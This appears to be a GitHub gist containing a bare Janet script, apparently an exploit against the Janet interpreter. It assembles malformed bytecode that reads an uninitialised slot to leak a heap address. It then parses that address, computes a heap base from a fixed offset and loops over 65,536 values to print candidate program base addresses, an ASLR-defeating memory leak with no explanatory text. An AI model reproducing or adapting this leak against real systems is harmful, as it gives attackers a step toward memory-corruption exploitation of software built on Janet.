Skip to content

Instantly share code, notes, and snippets.

@lionaneesh
Created April 1, 2021 03:44
Show Gist options
  • Save lionaneesh/5763bd4e5a33a7cb588c228dbf0adb2f to your computer and use it in GitHub Desktop.
Save lionaneesh/5763bd4e5a33a7cb588c228dbf0adb2f to your computer and use it in GitHub Desktop.
(def some
(asm
'{
constants @["blah" print]
:arity 0
slotcount 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
(def- leak_tup (some))
(print leak_tup)
(def- leak_str (describe leak_tup))
(def leak_addr (string/trim leak_str "<>array "))
(def leak_addr1 (string/slice leak_addr 2 6))
(def leak_addr2 (string/slice leak_addr 6 14))
(def hex_p "0x")
(print leak_addr)
(print leak_addr1)
(print leak_addr2)
(def leak_addr2h (string/join [hex_p leak_addr2]))
(def leak_addr1h (string/join [hex_p leak_addr1]))
(print leak_addr2h)
(print leak_addr1h)
(def leak_addr1i (scan-number leak_addr1h))
(def leak_addr2i (scan-number leak_addr2h))
(def leak_heap_ptr2 (- leak_addr2i 216656))
(def- buffer (tarray/buffer 8))
(def- buffleak2 (buffer/new 16))
(def- progleak (buffer/new 16))
(buffer/format buffleak2 "0x%x%x" leak_addr1i leak_heap_ptr2)
(print "heapbase")
(print buffleak2)
(def leak_pre (string/slice buffleak2 2 7))
(def leak_suf (string/slice buffleak2 11 14))
(def leak_preh (string/join [hex_p leak_pre]))
(def leak_sufh (string/join [hex_p leak_suf]))
(def leak_prei (scan-number leak_preh))
(def leak_sufi (scan-number leak_sufh))
(var found nil)
(loop [leak_mid :range [0x0 0xffff]
:until (not= found nil)
]
(def- buffleak3 (buffer/new 16))
(buffer/format buffleak3 "0x%x%.4x%.3x" leak_prei leak_mid leak_sufi)
(print buffleak3)
(def leak_prog_1 (string/slice buffleak3 2 8))
(def leak_prog_1h (string/join [hex_p leak_prog_1]))
(def leak_prog_1i (scan-number leak_prog_1h))
(def leak_prog_2 (string/slice buffleak3 8 14))
(def leak_prog_2h (string/join [hex_p leak_prog_2]))
(def leak_prog_2i (scan-number leak_prog_2h))
(def leak_prog_f (buffer/new 16))
(buffer/format leak_prog_f "0x%x%.6x" leak_prog_1i leak_prog_2i)
(print "possible program base addr")
(print leak_prog_f)
)
(os/sleep 200)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment